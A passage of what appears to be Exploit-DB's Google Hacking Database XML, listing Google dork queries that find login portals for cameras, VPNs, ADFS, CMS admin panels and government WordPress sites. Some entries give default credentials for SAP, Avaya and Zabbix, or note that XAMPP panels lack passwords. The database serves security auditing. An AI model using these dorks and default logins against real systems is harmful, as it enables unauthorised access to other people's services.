<shortDescription>inurl:&quot;saw.dll&quot; AND intitle:&quot;Sign In&quot;</shortDescription>
<textualDescription># Dork #
inurl:&quot;saw.dll&quot; AND intitle:&quot;Sign In&quot;
Login Portals.
</textualDescription>
<query>inurl:&quot;saw.dll&quot; AND intitle:&quot;Sign In&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;saw.dll&quot; AND intitle:&quot;Sign In&quot;</querystring>
<edb></edb>
<date>2020-02-10</date>
<author>Debashis Pal</author>
</entry>
<entry>
<id>7077</id>
<link>https://www.exploit-db.com/ghdb/7077</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;serverpush.htm&quot; intext:&quot;Foscam&quot;</shortDescription>
<textualDescription>#Google Dork: inurl:&quot;serverpush.htm&quot; intext:&quot;Foscam&quot;
# Various Online Devices
# Date: 28/06/2021
#Exploit Author: Neha Singh
Thanks and Regards
Neha Singh
</textualDescription>
<query>inurl:&quot;serverpush.htm&quot; intext:&quot;Foscam&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;serverpush.htm&quot; intext:&quot;Foscam&quot;</querystring>
<edb></edb>
<date>2021-08-23</date>
<author>Neha Singh</author>
</entry>
<entry>
<id>5776</id>
<link>https://www.exploit-db.com/ghdb/5776</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;serverpush.htm&quot; intext:&quot;Real-time&quot;</shortDescription>
<textualDescription>&quot;Real-time IP Camera Monitoring System&quot; Login Page
inurl:&quot;serverpush.htm&quot; intext:&quot;Real-time&quot;
Author : Zulfiqar Wardi (yunaranyancat)
</textualDescription>
<query>inurl:&quot;serverpush.htm&quot; intext:&quot;Real-time&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;serverpush.htm&quot; intext:&quot;Real-time&quot;</querystring>
<edb></edb>
<date>2020-03-05</date>
<author>yunaranyancat</author>
</entry>
<entry>
<id>6673</id>
<link>https://www.exploit-db.com/ghdb/6673</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;servicedesk/customer/user/login&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;servicedesk/customer/user/login&quot;
# Pages containing Login Portals (Service Desk Login Portals).
# Date: 9/11/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>inurl:&quot;servicedesk/customer/user/login&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;servicedesk/customer/user/login&quot;</querystring>
<edb></edb>
<date>2020-11-17</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6556</id>
<link>https://www.exploit-db.com/ghdb/6556</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;sms login&quot;</shortDescription>
<textualDescription>#Exploit Title : Dork shows login pages of various sites.
#Google Dork : inurl:&quot;sms login&quot;
#Date : 22/09/2020
#Exploit Author : Sanu Jose M
Thanks &amp; Regards,
Sanu Jose M
</textualDescription>
<query>inurl:&quot;sms login&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;sms login&quot;</querystring>
<edb></edb>
<date>2020-09-22</date>
<author>Sanu Jose M</author>
</entry>
<entry>
<id>4759</id>
<link>https://www.exploit-db.com/ghdb/4759</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;ssologin/&quot; -github.com</shortDescription>
<textualDescription>Pages containing login portals.
Bruno Schmid
</textualDescription>
<query>inurl:&quot;ssologin/&quot; -github.com</query>
<querystring>https://www.google.com/search?q=inurl:&quot;ssologin/&quot; -github.com</querystring>
<edb></edb>
<date>2018-04-12</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>891</id>
<link>https://www.exploit-db.com/ghdb/891</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;suse/login.pl&quot;</shortDescription>
<textualDescription>More Suse login portals, mostly Open Exchange.</textualDescription>
<query>inurl:&quot;suse/login.pl&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3A%22suse%2Flogin.pl%22</querystring>
<edb></edb>
<date>2005-02-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>487</id>
<link>https://www.exploit-db.com/ghdb/487</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;typo3/index.php?u=&quot; -demo</shortDescription>
<textualDescription>TYPO3 is a free Open Source content management system for enterprise purposes on the web and in intranets, featuring a set of ready-made interfaces, functions and modules.Vendor: http://www.typo3.com/Vulns: http://search.securityfocus.com/swsearch?query=Typo3&amp;sbm=bid&amp;submit=Search%21&amp;metaname=alldoc</textualDescription>
<query>inurl:&quot;typo3/index.php?u=&quot; -demo</query>
<querystring>https://www.google.com/search?q=inurl%3A%22typo3%2Findex.php%3Fu%3D%22+-demo</querystring>
<edb></edb>
<date>2004-09-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>7844</id>
<link>https://www.exploit-db.com/ghdb/7844</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;ucp.php?mode=login&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;.php?cid=&quot;+intext:&quot;online+betting&quot;
# Pages Containing Login Portals
# Date:14/06/2022
# Exploit Author: Reza Abasi</textualDescription>
<query>inurl:&quot;ucp.php?mode=login&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;ucp.php?mode=login&quot;</querystring>
<edb></edb>
<date>2022-06-14</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>4826</id>
<link>https://www.exploit-db.com/ghdb/4826</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;user_login/&quot; bitcoin | crypto | wallet</shortDescription>
<textualDescription>Login portals related to cryptocurrency wallets and cryptocurrency excange
web apps
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>inurl:&quot;user_login/&quot; bitcoin | crypto | wallet</query>
<querystring>https://www.google.com/search?q=inurl:&quot;user_login/&quot; bitcoin | crypto | wallet</querystring>
<edb></edb>
<date>2018-05-17</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>832</id>
<link>https://www.exploit-db.com/ghdb/832</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;usysinfo?login=true&quot;</shortDescription>
<textualDescription>Dell OpenManage enables remote execution of tasks such as system configuration, imaging, application installation and support. It also used to track hardware and software inventory, to update configurations, drivers, OS and applications and to proactively monitor and correct fault conditionsDell OpenManage standards include the Common Information Model (CIM), Desktop Management Interface (DMI), Simple Network Management Protocol (SNMP), and Wired for Management (WfM).Another possible search for this is:&quot;Log in.&quot; inurl:1311/servlet/</textualDescription>
<query>inurl:&quot;usysinfo?login=true&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3A%22usysinfo%3Flogin%3Dtrue%22</querystring>
<edb></edb>
<date>2005-01-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>391</id>
<link>https://www.exploit-db.com/ghdb/391</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;utilities/TreeView.asp&quot;</shortDescription>
<textualDescription>From the marketing brochure: &quot;UltiPro Workforce Management offers you the most comprehensive and cost-effective HR and payroll solution on the market today.&quot;The default passwords are easy to guess if an employee has not logged into this system. An attacker would only need to find the loginname.</textualDescription>
<query>inurl:&quot;utilities/TreeView.asp&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3A%22utilities%2FTreeView.asp%22</querystring>
<edb></edb>
<date>2004-07-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>1293</id>
<link>https://www.exploit-db.com/ghdb/1293</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;vsadmin/login&quot; | inurl:&quot;vsadmin/admin&quot; inurl:.php|.asp -&quot;Response.Buffer = True&quot; -javascript</shortDescription>
<textualDescription>Ecommerce templates makes a online shopping cart solution. This search finds the admin login.</textualDescription>
<query>inurl:&quot;vsadmin/login&quot; | inurl:&quot;vsadmin/admin&quot; inurl:.php|.asp -&quot;Response.Buffer = True&quot; -javascript</query>
<querystring>https://www.google.com/search?q=inurl:%22vsadmin/login%22+%7C+inurl:%22vsadmin/admin%22+inurl:.php%7C.asp++-%22Response.Buffer+%3D+True%22+-javascript&amp;num=100&amp;safe=off&amp;filter=0</querystring>
<edb></edb>
<date>2006-03-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>219</id>
<link>https://www.exploit-db.com/ghdb/219</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;webadmin&quot; filetype:nsf</shortDescription>
<textualDescription>This is a standard login page for Domino Web Administration.</textualDescription>
<query>inurl:&quot;webadmin&quot; filetype:nsf</query>
<querystring>https://www.google.com/search?q=inurl%3A%22webadmin%22+filetype%3Ansf</querystring>
<edb></edb>
<date>2004-05-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>7127</id>
<link>https://www.exploit-db.com/ghdb/7127</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;webconsole/webpages/login.jsp&quot; +intitle:&quot;Sophos&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;webconsole/webpages/login.jsp&quot; +intitle:&quot;Sophos&quot;
# Pages Containing Login Portals
# Date: 09/08/2021
# Exploit Author: hummerston</textualDescription>
<query>inurl:&quot;webconsole/webpages/login.jsp&quot; +intitle:&quot;Sophos&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;webconsole/webpages/login.jsp&quot; +intitle:&quot;Sophos&quot;</querystring>
<edb></edb>
<date>2021-08-24</date>
<author>hummerston</author>
</entry>
<entry>
<id>7506</id>
<link>https://www.exploit-db.com/ghdb/7506</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;wp-login.php?action=login&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;wp-login.php?action=login&quot;
# Pages Containing Login Portals
# Date:27/10/2021
# Exploit Author: Reza Abasi</textualDescription>
<query>inurl:&quot;wp-login.php?action=login&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;wp-login.php?action=login&quot;</querystring>
<edb></edb>
<date>2021-10-28</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>4608</id>
<link>https://www.exploit-db.com/ghdb/4608</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;xamppsecurity.php&quot;</shortDescription>
<textualDescription>inurl:&quot;xamppsecurity.php&quot;
ps.: with this dork it is possible to enter several administrative panels of xampp that do not have password for protection.
Att.
huehuehuebrbrbr</textualDescription>
<query>inurl:&quot;xamppsecurity.php&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;xamppsecurity.php&quot;</querystring>
<edb></edb>
<date>2017-11-03</date>
<author>huehuehuebrbrbr</author>
</entry>
<entry>
<id>4838</id>
<link>https://www.exploit-db.com/ghdb/4838</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:'/blog/Account/login.aspx'</shortDescription>
<textualDescription>Dorks about BlogEngine.NET login panel
Author: Brain Reflow
</textualDescription>
<query>inurl:'/blog/Account/login.aspx'</query>
<querystring>https://www.google.com/search?q=inurl:'/blog/Account/login.aspx'</querystring>
<edb></edb>
<date>2018-06-04</date>
<author>Brain Reflow</author>
</entry>
<entry>
<id>5151</id>
<link>https://www.exploit-db.com/ghdb/5151</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:'/logon/logonServlet'</shortDescription>
<textualDescription>*Search: * SAP NetWeaver Application Server Java Login
*Google Dorks: *inurl:'/logon/logonServlet'
*Default Credentials:* TMSADM: $1Pawd2&amp;
*Author:* Rishabh Sharma (Lazy Hacker)
</textualDescription>
<query>inurl:'/logon/logonServlet'</query>
<querystring>https://www.google.com/search?q=inurl:'/logon/logonServlet'</querystring>
<edb></edb>
<date>2019-03-11</date>
<author>Lazy Hacker</author>
</entry>
<entry>
<id>5150</id>
<link>https://www.exploit-db.com/ghdb/5150</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:'/scopia/entry/index.jsp'</shortDescription>
<textualDescription>Search: Avaya Scopia Login Page
*Google Dorks:* inurl:'/scopia/entry/index.jsp'
*Default Credentials: *admin/admin
Author: Rishabh Sharma (Lazy Hacker)
</textualDescription>
<query>inurl:'/scopia/entry/index.jsp'</query>
<querystring>https://www.google.com/search?q=inurl:'/scopia/entry/index.jsp'</querystring>
<edb></edb>
<date>2019-03-11</date>
<author>Lazy Hacker</author>
</entry>
<entry>
<id>5153</id>
<link>https://www.exploit-db.com/ghdb/5153</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:'/zabbix/index.php'</shortDescription>
<textualDescription>*Search: *Zabbix Login page (Network Monitoring Tool)
*Google Dorks: *inurl:'/zabbix/index.php'
*Default Credentials:* Admin:zabbix (Sometimes without login accessible)
*Author:* Rishabh Sharma (Lazy Hacker)
</textualDescription>
<query>inurl:'/zabbix/index.php'</query>
<querystring>https://www.google.com/search?q=inurl:'/zabbix/index.php'</querystring>
<edb></edb>
<date>2019-03-11</date>
<author>Lazy Hacker</author>
</entry>
<entry>
<id>7202</id>
<link>https://www.exploit-db.com/ghdb/7202</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:(&quot;admin/password.php&quot;) +site:.com</shortDescription>
<textualDescription># Google Dork: inurl:(&quot;admin/password.php&quot;) +site:.com
# Pages Containing Login Portals
# Date: 09/09/2021
# Exploit Author: Sanjay Singh</textualDescription>
<query>inurl:(&quot;admin/password.php&quot;) +site:.com</query>
<querystring>https://www.google.com/search?q=inurl:(&quot;admin/password.php&quot;) +site:.com</querystring>
<edb></edb>
<date>2021-09-14</date>
<author>Sanjay Singh</author>
</entry>
<entry>
<id>7174</id>
<link>https://www.exploit-db.com/ghdb/7174</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:(&quot;administrator/login.aspx&quot; OR &quot;admin/login.aspx&quot;) +site:.com</shortDescription>
<textualDescription># Google Dork: inurl:(&quot;administrator/login.aspx&quot; OR &quot;admin/login.aspx&quot;) +site:.com
# Pages Containing Login Portals
# Date: 04/09/2021
# Exploit Author: Ujas Dhami
</textualDescription>
<query>inurl:(&quot;administrator/login.aspx&quot; OR &quot;admin/login.aspx&quot;) +site:.com</query>
<querystring>https://www.google.com/search?q=inurl:(&quot;administrator/login.aspx&quot; OR &quot;admin/login.aspx&quot;) +site:.com</querystring>
<edb></edb>
<date>2021-09-09</date>
<author>Ujas Dhami</author>
</entry>
<entry>
<id>5370</id>
<link>https://www.exploit-db.com/ghdb/5370</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:*admin_login.php</shortDescription>
<textualDescription>This Dork Can Be Used To Find Login Pages.
Here is the Dork: inurl:*admin_login.php
</textualDescription>
<query>inurl:*admin_login.php</query>
<querystring>https://www.google.com/search?q=inurl:*admin_login.php</querystring>
<edb></edb>
<date>2019-08-19</date>
<author>Sourajeet Majumder</author>
</entry>
<entry>
<id>1409</id>
<link>https://www.exploit-db.com/ghdb/1409</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:+:8443/login.php3</shortDescription>
<textualDescription>Plesk is a multi platform control panel solution for hosting.More information: hxxp://www.swsoft.com/plesk/Vulnerability: PLESK 7.5 Reload (and lower) &amp; PLESK 7.6 for M$ Windows path passing and disclosure] Discovered By: GuanYu</textualDescription>
<query>inurl:+:8443/login.php3</query>
<querystring>https://www.google.com/search?q=inurl:%2B:8443/login.php3&amp;rls=org.mozilla:en-GB:official_s&amp;start=0&amp;sa=N</querystring>
<edb></edb>
<date>2006-09-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>5202</id>
<link>https://www.exploit-db.com/ghdb/5202</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:+CSCOE+/logon.html</shortDescription>
<textualDescription># Google Dork: inurl:+CSCOE+/logon.html
# Description: Google Dork to find Cisco Asa webvpn login pages
# Date: 2019-05-06
# Author: Miguel Santareno
# Contact: https://www.linkedin.com/in/miguelsantareno/
</textualDescription>
<query>inurl:+CSCOE+/logon.html</query>
<querystring>https://www.google.com/search?q=inurl:+CSCOE+/logon.html</querystring>
<edb></edb>
<date>2019-05-07</date>
<author>Miguel Santareno</author>
</entry>
<entry>
<id>6255</id>
<link>https://www.exploit-db.com/ghdb/6255</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:.*org/login</shortDescription>
<textualDescription>#* Google Dork: inurl:.*org/login
*# google dork to list login portal in .org domain*
*# Author: Shankar bhuvanesh
https://www.linkedin.com/in/bhuvaneshshankar/
</textualDescription>
<query>inurl:.*org/login</query>
<querystring>https://www.google.com/search?q=inurl:.*org/login</querystring>
<edb></edb>
<date>2020-06-09</date>
<author>Shankar bhuvanesh</author>
</entry>
<entry>
<id>5625</id>
<link>https://www.exploit-db.com/ghdb/5625</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:.elasticbeanstalk.com/admin</shortDescription>
<textualDescription>Application on AWS Elasticbeanstalk
# Google Dork: inurl:.elasticbeanstalk.com/admin
# Date: [4-11-2019]
# Author: [Mohammed*_*]
</textualDescription>
<query>inurl:.elasticbeanstalk.com/admin</query>
<querystring>https://www.google.com/search?q=inurl:.elasticbeanstalk.com/admin</querystring>
<edb></edb>
<date>2019-11-05</date>
<author>Mohammed*_*</author>
</entry>
<entry>
<id>4129</id>
<link>https://www.exploit-db.com/ghdb/4129</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:.gov/wp-login.php | inurl:.edu/wp-login.php | inurl:.mil/wp-login.php | inurl:.us/wp-login.php</shortDescription>
<textualDescription>inurl:.gov/wp-login.php | inurl:.edu/wp-login.php | inurl:.mil/wp-login.php
| inurl:.us/wp-login.php</textualDescription>
<query>inurl:.gov/wp-login.php | inurl:.edu/wp-login.php | inurl:.mil/wp-login.php | inurl:.us/wp-login.php</query>
<querystring>https://www.google.com/search?q=inurl:.gov/wp-login.php | inurl:.edu/wp-login.php | inurl:.mil/wp-login.php | inurl:.us/wp-login.php</querystring>
<edb></edb>
<date>2015-11-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>7336</id>
<link>https://www.exploit-db.com/ghdb/7336</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:.html.php:intext:&quot;admin&quot;|intext:&quot;user&quot;|intext:&quot;login&quot;:site:&quot;.in&quot;</shortDescription>
<textualDescription># Google Dork: inurl:.html.php:intext:&quot;admin&quot;|intext:&quot;user&quot;|intext:&quot;login&quot;:site:&quot;.in&quot;
# Pages Containing Login Portals
# Dtae: 25/09/2021
# Author: Adarsh S
</textualDescription>
<query>inurl:.html.php:intext:&quot;admin&quot;|intext:&quot;user&quot;|intext:&quot;login&quot;:site:&quot;.in&quot;</query>
<querystring>https://www.google.com/search?q=inurl:.html.php:intext:&quot;admin&quot;|intext:&quot;user&quot;|intext:&quot;login&quot;:site:&quot;.in&quot;</querystring>
<edb></edb>
<date>2021-09-30</date>
<author>Adarsh S</author>
</entry>
<entry>
<id>6581</id>
<link>https://www.exploit-db.com/ghdb/6581</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/ emis login</shortDescription>
<textualDescription> # Google Dork: inurl:/ emis login
# Date: 25/09/2020
# Author: Raghotham Mruthike
# Category: Pages Containing Login Portals
# Description: Dork shows admin pages of various sites.
</textualDescription>
<query>inurl:/ emis login</query>
<querystring>https://www.google.com/search?q=inurl:/ emis login</querystring>
<edb></edb>
<date>2020-09-28</date>
<author>Raghotham Mruthike</author>
</entry>
<entry>
<id>6553</id>
<link>https://www.exploit-db.com/ghdb/6553</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/ ims login</shortDescription>
<textualDescription># Google Dork: inurl:/ ims login
# Description :- Dork shows admin pages of various sites and Information
# Managenment System login portals
# Date: 21/09/2020
# Author: Sahil Saxena
# LinkedIn: https://www.linkedin.com/in/sahil-saxena-1333b9174
Thanks,
Sahil Saxena
</textualDescription>
<query>inurl:/ ims login</query>
<querystring>https://www.google.com/search?q=inurl:/ ims login</querystring>
<edb></edb>
<date>2020-09-21</date>
<author>Sahil Saxena</author>
</entry>
<entry>
<id>6574</id>
<link>https://www.exploit-db.com/ghdb/6574</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/ Kms login</shortDescription>
<textualDescription>#Exploit Title : Dork shows knowledge management system portals and login
# pages of various sites.
#Google Dork :inurl:/ Kms login
#Date : 24/09/2020
#Exploit Author : Sanu Jose M
Thanks &amp; Regards,
Sanu Jose M
</textualDescription>
<query>inurl:/ Kms login</query>
<querystring>https://www.google.com/search?q=inurl:/ Kms login</querystring>
<edb></edb>
<date>2020-09-25</date>
<author>Sanu Jose M</author>
</entry>
<entry>
<id>6563</id>
<link>https://www.exploit-db.com/ghdb/6563</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/ lms login</shortDescription>
<textualDescription> # Google Dork: inurl:/ lms login
# Date: 22/09/2020
# Author: Raghotham M
# Category: Pages Containing Login Portals
# Description: Dork shows Learning management system portals and admin
pages of various sites
</textualDescription>
<query>inurl:/ lms login</query>
<querystring>https://www.google.com/search?q=inurl:/ lms login</querystring>
<edb></edb>
<date>2020-09-23</date>
<author>Raghotham M</author>
</entry>
<entry>
<id>6542</id>
<link>https://www.exploit-db.com/ghdb/6542</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/ mis login</shortDescription>
<textualDescription> # Google Dork: inurl:/ mis login
# Date: [15/09/2020]
# Exploit Author: [Raghotham M]
# Category: [Pages Containing Login Portals]
# Description: [ Dork shows admin pages of various sites and Management
Information System login portals ]
</textualDescription>
<query>inurl:/ mis login</query>
<querystring>https://www.google.com/search?q=inurl:/ mis login</querystring>
<edb></edb>
<date>2020-09-16</date>
<author>Raghotham M</author>
</entry>
<entry>
<id>6580</id>
<link>https://www.exploit-db.com/ghdb/6580</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/ usda login</shortDescription>
<textualDescription># Google Dork: inurl:/ usda login
# Description :- Dork shows sensitive login portals
# Date: 25/09/2020
# Author: Sahil Saxena
# LinkedIn: https://www.linkedin.com/in/sahil-saxena-1333b9174
# Twitter: https://twitter.com/Sahil_delinitor
# GitHub: https://github.com/Sahil-69
# Bugcrowd: https://bugcrowd.com/Prickn
Thanks,
Sahil Saxena
</textualDescription>
<query>inurl:/ usda login</query>
<querystring>https://www.google.com/search?q=inurl:/ usda login</querystring>
<edb></edb>
<date>2020-09-28</date>
<author>Sahil Saxena</author>
</entry>
<entry>
<id>6441</id>
<link>https://www.exploit-db.com/ghdb/6441</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/+CSCOE+/logon.html?</shortDescription>
<textualDescription># Exploit Title: inurl:/+CSCOE+/logon.html?
# Google Dork: inurl:/+CSCOE+/logon.html?
# Date: 24/07/2020
#Dork: CISCO WebVPN Logins
# Author: Supun Halangoda
</textualDescription>
<query>inurl:/+CSCOE+/logon.html?</query>
<querystring>https://www.google.com/search?q=inurl:/+CSCOE+/logon.html?</querystring>
<edb></edb>
<date>2020-07-26</date>
<author>Supun Halangoda</author>
</entry>
<entry>
<id>6365</id>
<link>https://www.exploit-db.com/ghdb/6365</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/8080/admin.html</shortDescription>
<textualDescription># Google Dork: inurl:/8080/admin.html
# By using this dork, various web cameras can be revealed.
# Date: 2/07/2020
# Author: Alexandros Pappas
</textualDescription>
<query>inurl:/8080/admin.html</query>
<querystring>https://www.google.com/search?q=inurl:/8080/admin.html</querystring>
<edb></edb>
<date>2020-07-02</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5946</id>
<link>https://www.exploit-db.com/ghdb/5946</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/8080/login.html</shortDescription>
<textualDescription># Google Dork: inurl:/8080/login.html
# Various pages containing login portals.
# Date: 23/04/2020
# Author: Alexandros Pappas
</textualDescription>
<query>inurl:/8080/login.html</query>
<querystring>https://www.google.com/search?q=inurl:/8080/login.html</querystring>
<edb></edb>
<date>2020-04-24</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6669</id>
<link>https://www.exploit-db.com/ghdb/6669</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/?op=register</shortDescription>
<textualDescription>#Exploit Title : Displays various Login and registration portals.
#Google Dork :inurl:/?op=register
#Date : 17/11/2020
#Exploit Author : Sanu Jose M
Thanks &amp; Regards,
Sanu Jose M
</textualDescription>
<query>inurl:/?op=register</query>
<querystring>https://www.google.com/search?q=inurl:/?op=register</querystring>
<edb></edb>
<date>2020-11-17</date>
<author>Sanu Jose M</author>
</entry>
<entry>
<id>4336</id>
<link>https://www.exploit-db.com/ghdb/4336</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/?skipANDROID=true intext:&quot;Pydio Community&quot;</shortDescription>
<textualDescription>Pydio Community, Cloud and Secure FTP server logins.
-Xploit</textualDescription>
<query>inurl:/?skipANDROID=true intext:&quot;Pydio Community&quot;</query>
<querystring>https://www.google.com/search?q=inurl:/?skipANDROID=true intext:&quot;Pydio Community&quot;</querystring>
<edb></edb>
<date>2016-10-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>7150</id>
<link>https://www.exploit-db.com/ghdb/7150</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/about site:*.in</shortDescription>
<textualDescription># Google Dork: inurl:/about site:*.in
# Pages Containing Login Portals
# Date: 01/09/2021
# Exploit Author: Sarthi Shinde
</textualDescription>
<query>inurl:/about site:*.in</query>
<querystring>https://www.google.com/search?q=inurl:/about site:*.in</querystring>
<edb></edb>
<date>2021-09-02</date>
<author>sarthi shinde</author>
</entry>
<entry>
<id>5403</id>
<link>https://www.exploit-db.com/ghdb/5403</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/account/logon intitle:&quot;Log On&quot;</shortDescription>
<textualDescription>Login Pages:
inurl:/account/logon intitle:&quot;Log On&quot;
Reza Abasi(Turku)
</textualDescription>
<query>inurl:/account/logon intitle:&quot;Log On&quot;</query>
<querystring>https://www.google.com/search?q=inurl:/account/logon intitle:&quot;Log On&quot;</querystring>
<edb></edb>
<date>2019-08-19</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5404</id>
<link>https://www.exploit-db.com/ghdb/5404</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/account/signin intitle:&quot;signin&quot;</shortDescription>
<textualDescription>Login Pages:
inurl:/account/signin intitle:&quot;signin&quot;
Reza Abasi(Turku
</textualDescription>
<query>inurl:/account/signin intitle:&quot;signin&quot;</query>
<querystring>https://www.google.com/search?q=inurl:/account/signin intitle:&quot;signin&quot;</querystring>
<edb></edb>
<date>2019-08-19</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>6639</id>
<link>https://www.exploit-db.com/ghdb/6639</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/adfs/ls/?SAMLRequest</shortDescription>
<textualDescription># Google Dork: inurl:/adfs/ls/?SAMLRequest
# Date: 10/22/2020
# Exploit Author: Javier Bernardo
# Homepage: https://www.hack.com.ar
Javier Bernardo
*Ethical Hacker | Information Security Engineer*
Email: javierbernardo001@gmail.com | Website: hack.com.ar
</textualDescription>
<query>inurl:/adfs/ls/?SAMLRequest</query>
<querystring>https://www.google.com/search?q=inurl:/adfs/ls/?SAMLRequest</querystring>
<edb></edb>
<date>2020-10-26</date>
<author>Javier Bernardo</author>
</entry>
<entry>
<id>6640</id>
<link>https://www.exploit-db.com/ghdb/6640</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/adfs/ls/idpinitiatedsignon</shortDescription>
<textualDescription># Google Dork: inurl:/adfs/ls/idpinitiatedsignon
# Date: 10/28/2020
# Exploit Author: Javier Bernardo
# Homepage: https://www.hack.com.ar
Javier Bernardo
*Ethical Hacker | Information Security Engineer*
</textualDescription>
<query>inurl:/adfs/ls/idpinitiatedsignon</query>
<querystring>https://www.google.com/search?q=inurl:/adfs/ls/idpinitiatedsignon</querystring>
<edb></edb>
<date>2020-10-28</date>
<author>Javier Bernardo</author>
</entry>
<entry>
<id>6681</id>
<link>https://www.exploit-db.com/ghdb/6681</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/adfs/oauth2/authorize</shortDescription>
<textualDescription># Google Dork: inurl:/adfs/oauth2/authorize
# Date: 10/29/2020
# Exploit Author: Javier Bernardo
# Homepage: https://www.hack.com.ar
Javier Bernardo
*Ethical Hacker | Information Security Engineer*
Buenos Aires - Argentina
</textualDescription>
<query>inurl:/adfs/oauth2/authorize</query>
<querystring>https://www.google.com/search?q=inurl:/adfs/oauth2/authorize</querystring>
<edb></edb>
<date>2020-11-17</date>
<author>Javier Bernardo</author>
</entry>
<entry>
<id>5112</id>
<link>https://www.exploit-db.com/ghdb/5112</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/adfs/services/trust</shortDescription>
<textualDescription>ADFS instance logins
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>inurl:/adfs/services/trust</query>
<querystring>https://www.google.com/search?q=inurl:/adfs/services/trust</querystring>
<edb></edb>
<date>2019-02-15</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>4851</id>
<link>https://www.exploit-db.com/ghdb/4851</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/admin intitle:Pulse.CMS -pulsecms.com</shortDescription>
<textualDescription>Retrieve all admin page of websites build using Pulse CMS.
Author: Raj Kiran P
</textualDescription>
<query>inurl:/admin intitle:Pulse.CMS -pulsecms.com</query>
<querystring>https://www.google.com/search?q=inurl:/admin intitle:Pulse.CMS -pulsecms.com</querystring>
<edb></edb>
<date>2018-06-11</date>
<author>Raj Kiran P</author>
</entry>
<entry>
<id>5385</id>
<link>https://www.exploit-db.com/ghdb/5385</link>
<category>Pages Containing Login Portals</category>
